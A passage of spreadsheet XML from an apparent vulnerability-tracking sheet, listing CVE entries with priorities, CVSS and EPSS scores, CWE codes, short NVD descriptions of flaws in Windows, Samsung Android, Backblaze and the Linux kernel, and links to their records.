        </is>
      </c>
      <c r="S266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89682</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89709</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr"/>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr"/>
      <c r="Q267" s="5" t="inlineStr"/>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
lockd, nfsd: RCU-protect nlmsvc_ops dispatch
nlmsvc_ops is published by nfsd_lockd_init() and cleared by
nfsd_lockd_shutdown() with plain stores, while lockd dereferences
it unguarded from dispatch sites in fs/lockd/svcsubs.c. The pointer
targets nfsd's .rodata and the fopen/fclose callbacks live in nfsd's
.text, so a stale load after rmmod nfsd results in either a NULL
deref or a module-text use-after-free.
Declare nlmsvc_ops as __rcu, publish via rcu_assign_pointer(), clear
via RCU_INIT_POINTER() + synchronize_rcu(). Add a struct module
*owner field to nlmsvc_binding and pin the module across indirect
calls with try_module_get/module_put. When the binding is torn down,
fall back to fput() to avoid leaking struct file references.</t>
        </is>
      </c>
      <c r="S267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89709</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69681</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr"/>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr"/>
      <c r="Q268" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69681</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69727</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K26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69" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr"/>
      <c r="Q269" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69727</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69773</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K27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70" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr"/>
      <c r="Q270" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69773</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69777</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr"/>
      <c r="K271" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr"/>
      <c r="Q271" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Client allows an authorized attacker to elevate privileges over an adjacent network.</t>
        </is>
      </c>
      <c r="S271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69777</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19820</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>4ac701fe-44e9-4bcd-9585-dd6449257611</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr"/>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr"/>
      <c r="Q272" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Backblaze Client allows a local user to make the system not bootable by creating a link from Backblaze's folder to Windows OS system files during a backup. Successful exploitation requires an administrator-level system change that results in the absence of specific Windows OS security controls. This vulnerability is due to improper link resolution.</t>
        </is>
      </c>
      <c r="S272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19820</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21087</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr"/>
      <c r="K273" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr"/>
      <c r="Q273" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libmdnie.so prior to SMR Sep-2026 Release 1 allows local attackers to execute arbitrary code with system server privilege.</t>
        </is>
      </c>
      <c r="S273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21087</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21090</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr"/>
      <c r="K274" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr"/>
      <c r="Q274" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libsaviextractor.so prior to SMR Sep-2026 Release 1 allows local attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21090</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21091</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr"/>
      <c r="K275" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr"/>
      <c r="Q275" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libcodec2secevrcdec.so prior to SMR Sep-2026 Release 1 allows local attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21091</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69352</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K27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76" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr"/>
      <c r="Q276" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69352</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69391</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr"/>
      <c r="K277" s="5" t="inlineStr"/>
      <c r="L277" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr"/>
      <c r="Q277" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Broker Infrastructure Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69391</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69426</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr"/>
      <c r="K278" s="5" t="inlineStr"/>
      <c r="L278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr"/>
      <c r="Q278" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69426</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69456</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr"/>
      <c r="K279" s="5" t="inlineStr"/>
      <c r="L279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr"/>
      <c r="Q279" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69456</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69476</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K28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0" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr"/>
      <c r="Q280" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69476</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69489</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K28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1" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr"/>
      <c r="Q281" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69489</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69583</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K28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2" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr"/>
      <c r="Q282" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69583</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69589</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K28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3" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr"/>
      <c r="Q283" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69589</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69593</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K28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4" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr"/>
      <c r="Q284" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
